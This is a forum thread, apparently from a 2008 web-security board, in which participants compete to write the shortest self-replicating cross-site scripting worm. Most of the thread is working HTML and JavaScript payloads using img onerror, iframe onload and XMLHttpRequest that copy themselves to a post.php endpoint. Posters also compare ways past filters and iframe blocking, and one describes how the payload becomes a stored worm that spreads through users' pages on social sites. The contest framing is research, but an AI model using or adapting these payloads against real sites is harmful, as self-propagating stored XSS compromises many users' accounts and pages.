Yeh, still toying with other ideas as well:

<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

This equals marios:-

<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"

146 chars!!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/08/2008 08:16AM by Gareth Heyes.

In case of the forms, I'm still pondering on how to simplify this tag:

<input name="content">

if it can be reduced, it would have huge impact I guess.

other things crossed my mind:

innerHTML.link() or .sub()

if we can, cram it all into a whole link?

anyone had luck with:

<embed,frame,layer> ?

and of course the nobrainer:

this.onload = x();

--



Edited 1 time(s). Last edit at 01/08/2008 08:22AM by Ronald.

@Gareth: Nice but unfortunately both grow :-/

@Ronald: I played with most tags listed by the WASC Script Mapping Project - IFRAME IMHO is definitely the shortest way due to the fact that no src is needed for onload. I also tried numerous ways to leave away the name="content " - or map it via JS but no success yet... and the A-link() combo takes exactly the same space like B-bold() - damn:)



Edited 3 time(s). Last edit at 01/08/2008 08:27AM by .mario.

Yeah me2 usually the code growed instead, I had some clever sollutions but js assignment made it bloat. .mario, the IMG is still the smallest et doctype compliant yet? (yours and mine(+1))

or am I missing something? since the you'll need a closing tag on the ifr.

edit: with the link() I thought about just making a link, which should be shorter then .bold() if you can embed the code into the link, it's wot i meant :) cuz you can assign more attributes to <a> then <b> like just have: href="js(); - just exploring the ideas.


--



Edited 2 time(s). Last edit at 01/08/2008 08:35AM by Ronald.

This one doesn't :-

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Still my vote goes to the 'img' since 'iframes' can be blocked whereas images are usually not. And I also think on how some prevention methods work, see maybe the scan for iframes, who scans for images? further more if you look at myspace-like sites, they could allow 'img' over 'iframe', thus give it a far wider spectrum.

@Ronald:Who scans for javascript?



Edited 1 time(s). Last edit at 01/08/2008 09:22AM by Spyware.

@Gareth: It does - since the FORM tag isn't closed.

@Ronald:

Quote

the IMG is still the smallest et doctype compliant yet?

I think the IFRAME solution is valid since it utilizes slice to not grow and I am pretty sure that valid markup is not a requirement - or is it? if yes you were right with the IMG tag I think. but I'm not sure...

@Spyware: PHPIDS scans for all malicious JS/HTML ;)

@mario

Damn it!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@spyware,

well, also think about a flawed BBcode parser here, since most allow images then it's a matter of getting the event injected properly. All speculation of course, since I don't win either way I'd like to cast my vote on the one that I started, the 'img' instead of the 'iframe' version (which I started also btw).

Matter of preference I figure, if someone can come up with something better, give it a go i'dd say. ;)

-Wait, I was being stupid all along ;x-



Edited 2 time(s). Last edit at 01/08/2008 10:21AM by Spyware.

not sure why we haven't used:

.cloneNode(1)
.cloneNode(1).innerHTML
.cloneNode(1,alert('xss')).innerHTML

yet

not because of .parentNode, but just so it could come in handy maybe cause we can clone id spans with them.

--

<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>

-matt
http://badsamaritan.net

@badsamaritan

I deleted your other vector posted in the wrong thread, since this is the same.

<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>

meh a crappy 134 :( and Firefox doesn't support outerHTML :( - so this vector is IE, Opera and Safari only.


Also hats of to sdc, shawn, ronald, mario, gareth, doctordan and all the others - you have certainly taught this rookie a thing or 2 (and to think I seriously thought my first submission was the shizznit).


Yes, I realise these worms don't meet the competition criteria but at least we can see how small we can go when we target specific browsers.

EDIT: 111 bytes (IE only again)
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 16 time(s). Last edit at 01/08/2008 08:33PM by digi7al64.

\0/ - 133bytes - works with both Firefox and IE (i hope)

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B

133 bytes as well. Should work with IE and FF. The '0x0B' is just a representation of the vertical tab character in hex.

-Dan

@DoctorDan - I think your submission would fail the rules as the { could already be used on the page... but in saying that so could the _ which I use so perhaps rsnake could clarify this point for us.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Alright, but that character can be easily changed to any uncommon character. I chose '{' just randomly, and anything will work in its place.

-Dan

Regarding XHR - It appears as though Firefox's support of adding the "Content type" header into the XHR request only begun between versions 2.0.0.7 and 2.0.0.11 (the current version - which we have been testing with Apache today). Therefore rsnake are we expected to support these out-of-date browsers... which means adding the content-type header and essentially killing the use of XHR in this contest?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/09/2008 12:16AM by digi7al64.

I was just testing the two most recent submissions.
I run Apache/2.2.3 and I use Firefox/2.0.0.6

What I had to change:
- Added the content-type. This was completely required because Apache would not accept any POST content without it, and Firefox wouldn't automatically add it.
- The plus symbol had to be encoded. Otherwise, it would be converted to a space. I tried encode() but it didn't touch the plus symbol.

Both of these changes were completely required for the code to properly run.

Here is digi7al64's submission, modified:

<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>

224 characters seems long, but at least it works with slightly older versions of FF and Apache.

@digi7al64

I like your idea, but it's doctype dependant due to the _id selector and therefore might not work everywhere,
so to be universal it requires at least some logic whether to use only _ or document._

To be formal, it does not run -standalone- without a doctype/body that is, which violates at least one rule.

About the 'content type', that's a clever question; since every Firefox user is 'almost' updated automatically when a new version is available, I would say it's no problem, but that's up to RSnake.

@GlacialPhoenix

Apache supports content negotiation by default since 1.x, that means for content-type as well as for type mapping, as well other mimes/headers. I have 4 different default instances of Apache running from 1.x to latest, and all negotiate properly without a content-type, since my hunch is that the browser already says it's is POST and therefore it will be treated like application/x-www-form-urlencoded as default. And since on your Apache instance the + symbol wasn't properly encoded, it means that you either have turned content negotiation down, of removed the mod_negotiation module, or it's broken. In other words, sounds as an exotic issue.

Ronald Wrote:
-------------------------------------------------------
> [...] it means that you either have
> turned content negotiation down, of removed the
> mod_negotiation module, or it's broken. In other
> words, sounds as an exotic issue.


Haven't touched it since I installed. I also double-checked that negotiation is installed. Just to be sure, I uploaded it to my Dreamhost account (Apache/2.0.61), attempted it again and got the same results. Although, I guess that it could still be considered an exotic issue. =/



Edited 1 time(s). Last edit at 01/09/2008 01:22AM by GlacialPhoenix.

@Ronald - looking at the rule it states

6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.

Therefore my take is that you can use _.innerHTML which makes my code fine but then again 2 states

2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.


Now is saying that if i modify my code to the following it will still fail as there is no document object within the page as I understand when there are no html,head and body tags.

send('content=<p id=_>'+document.getElementById('_').innerHTML+'<p>')

Thus the concept of id's are useless unless we add all the relevant tags into the payload. looks like im back to the drawing board :(

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Anyone pleasssseee explain implementation...

Correct me if i'm wrong.

1) Create post.php file contain above.
2) open post.php file
3) infinite loop!
4) ctrl+Alt+Del > shutdown browser.

I can't see any worm propergate themself.. any expert here, Please explain ... Thx in advance

i'm noob,
krazl
www.krazl.com

http://www.krazl.com

@digi7al64 Ay, we never know the page has a proper DOM, or the page where it's send to. post.php could be only a PHP script without a full DOM.

@krazl, well it replicates itself to post.php, and then again, and again. For the sake of example this is how it's done and how worms can propagate itself, in a real world example we don't alert('xss') but rather inject it into a database to let it become a stored worm, taht again when someone opens his page, will inject the page of his peers, and so on.

@doctordan - from a stand alone point you have the same issues i did in that you are assuming a parent node/dom exists.

@ronald - thanks for the feedback, it drove me to look at this from a slightly different angle whilst teaching me even more about how the dom works.

FINAL SUBMISSIONS FOR ME

No Doc Type Issues - 140 byte XHR worm

<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>

Doc Type Issues - 131 byte XHR worm

<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'<p>')</script><p>

Smallest XHR Internet Explorer worm - 111 bytes

<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'